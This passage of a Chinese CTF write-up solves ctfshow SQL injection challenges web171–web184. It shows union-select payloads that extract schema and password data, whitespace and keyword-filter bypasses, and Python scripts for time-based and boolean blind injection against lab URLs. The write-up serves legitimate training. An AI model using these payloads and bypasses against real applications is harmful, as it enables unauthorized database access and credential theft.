<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">and</span> table_name=<span class="string">'ctfshow_user'</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727052509428.png" alt="image-20210727052509428"></p>
<ul>
<li>查flag</li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="keyword">password</span> <span class="keyword">from</span> ctfshow_user <span class="comment">--+</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727052648926.png" alt="image-20210727052648926"></p>
<h2 id="web172"><a href="#web172" class="headerlink" title="web172"></a>web172</h2><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//检查结果是否有flag</span><br><span class="line">    if($row-&gt;username!=='flag')&#123;</span><br><span class="line">      $ret['msg']='查询成功';</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<ul>
<li><strong>多了层过滤，没有检测到username有flag结果才能查询成功，不查询username，就用password，和上题没区别</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">password</span> <span class="keyword">from</span> ctfshow_user2<span class="comment">--+</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web173"><a href="#web173" class="headerlink" title="web173"></a>web173</h2><blockquote>
<ul>
<li>和上题一样</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="keyword">password</span> <span class="keyword">from</span> ctfshow_user3<span class="comment">--+</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web174"><a href="#web174" class="headerlink" title="web174"></a>web174</h2><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//检查结果是否有flag</span><br><span class="line">    if(!preg_match('/flag|[0-9]/i', json_encode($ret)))&#123;</span><br><span class="line">      $ret['msg']='查询成功';</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<ul>
<li><strong>过滤了数字，考察replace的运用，先判断有几个字段</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#39; order by 2 %23</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727091147187.png" alt="image-20210727091147187"></p>
<blockquote>
<ul>
<li><strong>联合函数添加a和b两个数据ok</strong></li>
</ul>
</blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727091245501.png" alt="image-20210727091245501"></p>
<blockquote>
<ul>
<li>先构造一个replace将0-9全部置换</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">replace</span>(<span class="keyword">replace</span>(<span class="keyword">replace</span>(<span class="keyword">replace</span>(<span class="keyword">replace</span>(<span class="keyword">replace</span>(<span class="keyword">replace</span>(<span class="keyword">replace</span>(<span class="keyword">replace</span>(<span class="keyword">replace</span>(<span class="number">1234567890</span>,<span class="number">1</span>,<span class="string">'numA'</span>),<span class="number">2</span>,<span class="string">'numB'</span>),<span class="number">3</span>,<span class="string">'numC'</span>),<span class="number">4</span>,<span class="string">'numD'</span>),<span class="number">5</span>,<span class="string">'numE'</span>),<span class="number">6</span>,<span class="string">'numF'</span>),<span class="number">7</span>,<span class="string">'numG'</span>),<span class="number">8</span>,<span class="string">'numH'</span>),<span class="number">9</span>,<span class="string">'numI'</span>),<span class="string">'0'</span>,<span class="string">'numJ'</span>);</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727091509981.png" alt="image-20210727091509981"></p>
<blockquote>
<ul>
<li>查表构造语句将1-0换成table_name</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#39; union all select &#39;a&#39;,replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(group_concat(table_name),1,&#39;numA&#39;),2,&#39;numB&#39;),3,&#39;numC&#39;),4,&#39;numD&#39;),5,&#39;numE&#39;),6,&#39;numF&#39;),7,&#39;numG&#39;),8,&#39;numH&#39;),9,&#39;numI&#39;),&#39;0&#39;,&#39;numJ&#39;) from information_schema.tables where table_schema&#x3D;database() %23</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727091702800.png" alt="image-20210727091702800"></p>
<blockquote>
<ul>
<li>查字段名</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#39; union all select &#39;a&#39;,replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(group_concat(column_name),1,&#39;numA&#39;),2,&#39;numB&#39;),3,&#39;numC&#39;),4,&#39;numD&#39;),5,&#39;numE&#39;),6,&#39;numF&#39;),7,&#39;numG&#39;),8,&#39;numH&#39;),9,&#39;numI&#39;),&#39;0&#39;,&#39;numJ&#39;) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;&#39;ctfshow_user4&#39; %23</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727091826089.png" alt="image-20210727091826089"></p>
<blockquote>
<ul>
<li>查结果</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#39; union select &#39;a&#39;,replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,1,&#39;numA&#39;),2,&#39;numB&#39;),3,&#39;numC&#39;),4,&#39;numD&#39;),5,&#39;numE&#39;),6,&#39;numF&#39;),7,&#39;numG&#39;),8,&#39;numH&#39;),9,&#39;numI&#39;),&#39;0&#39;,&#39;numJ&#39;) from ctfshow_user4--+</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727091848759.png" alt="image-20210727091848759"></p>
<blockquote>
<ul>
<li>写个小py来转换一下</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">flagstr = <span class="string">'ctfshow&#123;numHnumEbnumCnumFenumJd-anumEnumHnumF-numDfbnumC-adnumBnumJ-enumAnumAnumBenumDnumFnumDnumGnumHnumAnumH&#125;'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line">flag = flag + flagstr.replace(<span class="string">'numA'</span>,<span class="string">'1'</span>).\</span><br><span class="line">    replace(<span class="string">'numB'</span>,<span class="string">'2'</span>)\</span><br><span class="line">    .replace(<span class="string">'numC'</span>,<span class="string">'3'</span>)\</span><br><span class="line">    .replace(<span class="string">'numD'</span>,<span class="string">'4'</span>)\</span><br><span class="line">    .replace(<span class="string">'numE'</span>,<span class="string">'5'</span>)\</span><br><span class="line">    .replace(<span class="string">'numF'</span>,<span class="string">'6'</span>)\</span><br><span class="line">    .replace(<span class="string">'numG'</span>,<span class="string">'7'</span>)\</span><br><span class="line">    .replace(<span class="string">'numH'</span>,<span class="string">'8'</span>)\</span><br><span class="line">    .replace(<span class="string">'numI'</span>,<span class="string">'9'</span>)\</span><br><span class="line">    .replace(<span class="string">'numJ'</span>,<span class="string">'0'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210727091931245.png" alt="image-20210727091931245"></p>
<h2 id="web175"><a href="#web175" class="headerlink" title="web175"></a>web175</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//检查结果是否有flag</span></span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">'/[\x00-\x7f]/i'</span>, json_encode($ret)))&#123;</span><br><span class="line">      $ret[<span class="string">'msg'</span>]=<span class="string">'查询成功'</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li>将ascii所有字符都禁了，无回显就用盲注，写个py脚本</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/30</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">url = <span class="string">"http://bab11107-9d31-46bf-b41e-0a04bb92b155.challenge.ctf.show:8080/api/v5.php"</span></span><br><span class="line">dict = <span class="string">"0123456789abcdefghijklmnopqrstuvwxyz&#123;&#125;-"</span></span><br><span class="line">flag =<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">50</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> dict:</span><br><span class="line">        payload= <span class="string">f"?id=1' and if(substr((select password from ctfshow_user5 where username=\"flag\"),<span class="subst">&#123;i&#125;</span>,1)=\"<span class="subst">&#123;j&#125;</span>\",sleep(3),0)--+"</span></span><br><span class="line">        res_get = url + payload</span><br><span class="line">        start = time.time()</span><br><span class="line">        res = requests.get(url=res_get)</span><br><span class="line">        end = time.time()</span><br><span class="line">        <span class="keyword">if</span> end-start &gt; <span class="number">3</span>:</span><br><span class="line">            flag = flag + j</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730095850795.png" alt="image-20210730095850795"></p>
</blockquote>
<h2 id="web176"><a href="#web176" class="headerlink" title="web176"></a>web176</h2><blockquote>
<ul>
<li><strong>发现是对select的过滤，但是没有过滤大小写</strong></li>
</ul>
</blockquote>
<ul>
<li>表</li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union all <span class="keyword">Select</span> <span class="number">1</span>,<span class="number">2</span>,(<span class="keyword">Select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()) <span class="comment">--+</span></span><br></pre></td></tr></table></figure></div>

<ul>
<li>字段</li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union all <span class="keyword">Select</span> <span class="number">1</span>,<span class="number">2</span>,(<span class="keyword">Select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">and</span> table_name=<span class="string">'ctfshow_user'</span>) <span class="comment">--+</span></span><br></pre></td></tr></table></figure></div>

<ul>
<li>查flag</li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' union all <span class="keyword">Select</span> <span class="number">1</span>,<span class="number">2</span>,(<span class="keyword">Select</span> <span class="keyword">password</span> <span class="keyword">from</span> ctfshow_user <span class="keyword">where</span> username=<span class="string">'flag'</span>) <span class="comment">--+</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li>第二种方法简单——利用or的后面条件一直为真，可以显示所有数据</li>
</ul>
</blockquote>
<ul>
<li>查所有数据</li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1' or 1=1<span class="comment">--+</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730101403056.png" alt="image-20210730101403056"></p>
<h2 id="web177"><a href="#web177" class="headerlink" title="web177"></a>web177</h2><blockquote>
<ul>
<li>第一种方法判断过滤了空格，但是依旧可以用or通杀显示所有数据</li>
</ul>
</blockquote>
<p><strong>查flag</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1'or(1=1)%23</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>第二种方法，这次发现还多过滤了空格，我们可以用<code>%0a</code>换行符或者注释符绕过(或者<code>%09,%0b,%0c,%0d</code>都可以)，这次我们用万能密码吧，用上面的也可以，不过绕过空格后有点长，后面的注释我们用<code>#</code>的url编码形式<code>%23</code></strong></li>
</ul>
</blockquote>
<p><strong>查flag</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1'%09union%09select%091,2,(<span class="keyword">select</span>%<span class="number">09</span><span class="keyword">password</span>%<span class="number">09</span><span class="keyword">from</span>%<span class="number">09</span>ctfshow_user%<span class="number">09</span><span class="keyword">where</span>%<span class="number">09</span>username=<span class="string">'flag'</span>)%<span class="number">23</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web178"><a href="#web178" class="headerlink" title="web178"></a>web178</h2><blockquote>
<ul>
<li><strong>和上题差不多，多办了/**/</strong>这个注释符号，也可以<strong>万能密码<code>1&#39;%09or%091=1%23</code></strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1'%09union%09select%091,2,(<span class="keyword">select</span>%<span class="number">09</span><span class="keyword">password</span>%<span class="number">09</span><span class="keyword">from</span>%<span class="number">09</span>ctfshow_user%<span class="number">09</span><span class="keyword">where</span>%<span class="number">09</span>username=<span class="string">'flag'</span>)%<span class="number">23</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web179"><a href="#web179" class="headerlink" title="web179"></a>web179</h2><blockquote>
<ul>
<li><strong>和上题差不多，过滤了<code>%09,%0b,%0d</code>和空格也可以用万能密码<code>1&#39;%0cor%0c1=1%23</code></strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1'%0cunion%0cselect%0c1,2,(<span class="keyword">select</span>%<span class="number">0</span>cpassword%<span class="number">0</span>cfrom%<span class="number">0</span>cctfshow_user%<span class="number">0</span>cwhere%<span class="number">0</span>cusername=<span class="string">'flag'</span>)%<span class="number">23</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web180"><a href="#web180" class="headerlink" title="web180"></a>web180</h2><blockquote>
<ul>
<li><strong>这题%23也过滤了，绕过空格的基本都过滤了，我们想着拼凑语句</strong></li>
</ul>
</blockquote>
<p><strong>payload</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.1'or(id='26')and'1=1</span><br></pre></td></tr></table></figure></div>

<p>这个拼接之后的语句就是</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">id</span>,username,<span class="keyword">password</span> <span class="keyword">from</span> ctfshow_user <span class="keyword">where</span> username !=<span class="string">'flag'</span> <span class="keyword">and</span> <span class="keyword">id</span> = <span class="string">'1.1'</span><span class="keyword">or</span>(<span class="keyword">id</span>=<span class="string">'26'</span>)<span class="keyword">and</span><span class="string">'1=1’ limit 1;</span></span><br></pre></td></tr></table></figure></div>

<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">id='1.1'or(id=26)and'1=1' limit 1;</span><br><span class="line">也就是</span><br><span class="line">(id='1.1') or ((id=26) and '1=1') limit 1;</span><br><span class="line">前面因为1.1不存在为0，后面为1，所以整个条件为1</span><br></pre></td></tr></table></figure></div>

<h2 id="web181"><a href="#web181" class="headerlink" title="web181"></a>web181</h2><blockquote>
<ul>
<li>和上题一样</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.1'or(id=26)and'a'='a</span><br></pre></td></tr></table></figure></div>

<h2 id="web182"><a href="#web182" class="headerlink" title="web182"></a>web182</h2><blockquote>
<ul>
<li>和上题一样</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1.1'or(id=26)and'a'='a</span><br></pre></td></tr></table></figure></div>

<h2 id="web183"><a href="#web183" class="headerlink" title="web183"></a>web183</h2><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//拼接sql语句查找指定ID用户</span><br><span class="line">  $sql = "<span class="keyword">select</span> <span class="keyword">count</span>(pass) <span class="keyword">from</span> <span class="string">".$_POST['tableName']."</span>;";</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>提示说拼接sql语句找到指定id，因为前几天他的表都是ctfshow_user，我们可以尝试一下这个表，然后用like和%进行模糊匹配</strong></li>
</ul>
</blockquote>
<ul>
<li><strong>post传参</strong></li>
</ul>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730124155127.png" alt="image-20210730124155127"></p>
<ul>
<li><strong>这里明显有布尔盲注，来进行猜解flag，写一个py脚本</strong></li>
</ul>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/4/8 21:24</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://e9202b55-424f-460d-8597-692168ba560f.challenge.ctf.show:8080/select-waf.php"</span></span><br><span class="line">str = <span class="string">"0123456789abcdefghijklmnopqrstuvwxyz&#123;&#125;-"</span></span><br><span class="line">flag = <span class="string">"ctfshow"</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">666</span>):</span><br><span class="line">    print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(i))</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">"tableName"</span>:<span class="string">"(ctfshow_user)where(pass)like'&#123;0&#125;%'"</span>.format(flag+j)</span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url,data)</span><br><span class="line">        <span class="keyword">if</span> res.text.find(<span class="string">"$user_count = 1"</span>)&gt;<span class="number">0</span>:</span><br><span class="line">            flag += j</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j==<span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210730132558687.png" alt="image-20210730132558687"></p>
</blockquote>
<h2 id="web184"><a href="#web184" class="headerlink" title="web184"></a>web184</h2><blockquote>
<ul>
<li><strong>这把过滤了where，我们用右连接来做</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfshow% 的十六进制 为 0x63746673686F7725</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>所以用他来匹配like,放出了空格</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tableName=ctfshow_user as a right join ctfshow_user as b on b.pass like 0x63746673686F7725</span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li><strong>写个py来跑flag</strong></li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/7/30 21:24</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">to_hex</span><span class="params">(s)</span>:</span></span><br><span class="line">    <span class="comment">#转十六进制</span></span><br><span class="line">    str_16 = binascii.b2a_hex(s.encode(<span class="string">'utf-8'</span>))</span><br><span class="line">    res = bytes.decode(str_16)</span><br><span class="line">    <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://d42dba7c-384e-4a5d-9a5d-26398d42ce7c.challenge.ctf.show:8080/select-waf.php"</span></span><br><span class="line">str = <span class="string">"0123456789abcdefghijklmnopqrstuvwxyz&#123;&#125;-"</span></span><br><span class="line">flag = <span class="string">"ctfshow"</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">666</span>):</span><br><span class="line">     print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(i))</span><br><span class="line">     <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        result = <span class="string">"0x"</span> + to_hex(flag + j + <span class="string">"%"</span>)</span><br><span class="line">        data = &#123;</span><br><span class="line">             <span class="string">"tableName"</span>:<span class="string">"ctfshow_user as a right join ctfshow_user as b on b.pass like &#123;0&#125;"</span>.format(result)</span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url,data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"$user_count = 43"</span> <span class="keyword">in</span> res.text:</span><br><span class="line">             flag += j</span><br><span class="line">             print(flag)</span><br><span class="line">             <span class="keyword">if</span> j==<span class="string">"&#125;"</span>:</span><br><span class="line">                 print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                 exit()</span><br><span class="line">             <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 